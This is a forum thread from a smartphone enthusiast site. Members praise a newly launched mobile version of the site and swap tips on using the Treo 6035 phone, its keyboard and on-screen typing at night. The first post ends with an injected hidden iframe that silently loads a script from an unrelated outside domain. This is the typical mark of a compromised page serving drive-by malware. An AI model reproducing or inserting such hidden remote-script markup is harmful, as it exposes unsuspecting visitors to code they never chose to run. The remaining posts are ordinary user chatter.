+ Reply to Thread
Results 1 to 20 of 20
  1. #1
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827

    The Mobile Site is UP!!!

    I think that JJ must've forgotten that he did this! (or maybe he wasn't ready to announce it! If so, sorry JJ! ).

    Stop what you are doing NOW, get out your 6035's, and go to mobile.smartphonesource.com and give it a test drive! And for those of you that said "but we want one like TreoCentral!!!"... well, this one is just as good as that one! (maybe better.... since it's about stuff we actually CARE about ).
    Hooray for JJ! :drink1 :clap :clap :drink1<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

  2. #2
    Registered User
    Join Date
    06-24-2002
    Posts
    47
    Great work!!
    Guess I'll have to keep my keyboard handy now.

  3. #3
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by eener
    Great work!!
    Guess I'll have to keep my keyboard handy now.
    Yeah... that would be cool. But can you use it while online? I didn't think that the 6035 could do that?
    Please visit my picture site: Robert-O-Rama :)

  4. #4
    Registered User
    Join Date
    06-24-2002
    Posts
    47
    ok, perhaps someone can figure out a better way to do this, but if you disconnect, and detach your keyboard, reattach the keyboard, type your message (as I am doing now) and then reconnect....well, if it works, you'll see this message. It not, well.........

  5. #5
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    HOLD OFF!!! The site is not totally programmed and there are still some bugs out there. This is not yet for the feint of heart. Recommend waiting for the formal announcement.

    Have to sound the alarm on this one. JJ showed me this earlier today and I got stuck somewhere I had no idea how to get out of.

  6. #6
    Registered User
    Join Date
    08-27-2003
    Posts
    251
    The problem is that a session variable is set so that your view a different template.... If you get into the mobile site and want to return to the orignal site... Just logout and you will see Smartphonesource in the normal skin..
    -=Jimmyjoe=-

  7. #7
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by eener
    ok, perhaps someone can figure out a better way to do this, but if you disconnect, and detach your keyboard, reattach the keyboard, type your message (as I am doing now) and then reconnect....well, if it works, you'll see this message. It not, well.........
    Well, I guess it worked? It's not too much of a hassle to do all that? At least you won't have to do it like that anymore with the 7135! :drink1
    Please visit my picture site: Robert-O-Rama :)

  8. #8
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    i just flip out my thumboard on the i300 and type away... :drink3

  9. #9
    Low Level Functionary sidneyc's Avatar
    Join Date
    04-08-2002
    Location
    South Florida
    Posts
    85
    I'm having trouble getting into site. I type with the www and without the www. Still no results.

  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by sidneyc
    I'm having trouble getting into site. I type with the www and without the www. Still no results.
    I just dialed in and was able to get in with no problems. You should just be using mobile.smartphonesource.com . What browser are you using? I'm using Blazer, but I also access it using Eudora Web.
    Please visit my picture site: Robert-O-Rama :)

  11. #11
    Registered User dwdod's Avatar
    Join Date
    07-01-2001
    Location
    Metro Washington D.C. area
    Posts
    2,085
    Here i am sending a message to the forum from my 6035 for the 1st time. it works alright, but for efficiency, please give me back my computer!

  12. #12
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by dwdod
    Here i am sending a message to the forum from my 6035 for the 1st time. it works alright, but for efficiency, please give me back my computer!
    Yep, it's no substitute for a computer, but very useful when you can't have a computer with you. I keep my 6035 on the bed next to me at night... last night I woke up at like 2:30 a.m. and checked my e-mail and read some posts
    Please visit my picture site: Robert-O-Rama :)

  13. #13
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Yep, I was still awake at my computer when you PM'd me Robert. I don't know who is sicker, you checking messages in the middle of the night or me still being up at the computer at the time. :eyecrazy
    ~'kito
    pdaPhoneHome Moderator

  14. #14
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Markito Burrito
    Yep, I was still awake at my computer when you PM'd me Robert. I don't know who is sicker, you checking messages in the middle of the night or me still being up at the computer at the time. :eyecrazy
    lol... I think it's a tie. It's pretty cool though, being able to quickly dial in and read e-mail and new posts without even getting out of bed. Good thing I got my backlight problem fixed! :clap
    Please visit my picture site: Robert-O-Rama :)

  15. #15
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    By the way, how did you get that backlight problem fixed? Traded in for a Furby, I mean refurbished?
    ~'kito
    pdaPhoneHome Moderator

  16. #16
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Markito Burrito
    By the way, how did you get that backlight problem fixed? Traded in for a Furby, I mean refurbished?
    Yep, I got a refurb... and surprisingly it was in perfect shape. I was worried since I had seen several refurbs in the stores, and they all had something wrong with them. And I can now navigate around the silkyboard pretty well in the dark. (basically all I do is tap around until I activate the virtual keyboard by starting at the space bar and moving right from there).
    Please visit my picture site: Robert-O-Rama :)

  17. #17
    Registered User
    Join Date
    10-27-2002
    Posts
    2

    Operating in the dark

    I use a Fitaly Stamp for the M100 on
    my 6035. The only problem is that
    the shortcut key does not work well.
    For that, I exit keyboard mode and
    enter the shortcut in the grafitti area.

    Anyway, to do stuff at night, I map
    the to-do button to applications, and
    the upward line to get the on-screen
    keyboard. At night, I turn on the light, get the applications, and disable Fitaly stamp.
    Then, I can use the on screen keyboard.

    Another way is to use the stylus by Sai-Tek that has a built in light, but
    I lost mine Guess I'll have to order one or two.

    Martin Cohen

  18. #18
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827

    Re: Operating in the dark

    Originally posted by mjcohen
    Anyway, to do stuff at night, I map
    the to-do button to applications, and
    the upward line to get the on-screen
    keyboard. At night, I turn on the light, get the applications, and disable Fitaly stamp.
    Then, I can use the on screen keyboard.

    Another way is to use the stylus by Sai-Tek that has a built in light, but
    I lost mine Guess I'll have to order one or two.

    Martin Cohen
    That's a good idea... I'll give it a try. But I have gotten pretty good at getting around in the dark. I also like the sound of that stylus with the built in light! Where did you get it?
    Please visit my picture site: Robert-O-Rama :)

  19. #19
    Registered User
    Join Date
    10-30-2002
    Location
    NJ
    Posts
    10
    When I type in the site in my 6035 using Endora Web, it cannot find the site?

    Any idea's

  20. #20
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Maybe the PQA will work for you --

    http://www.smartphonesource.com/vbul...&threadid=3228

    (be sure to look at entire thread)


    oh mlfca, Welcome to the Smartphonesource.com!
    iPhone therefore iAm.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts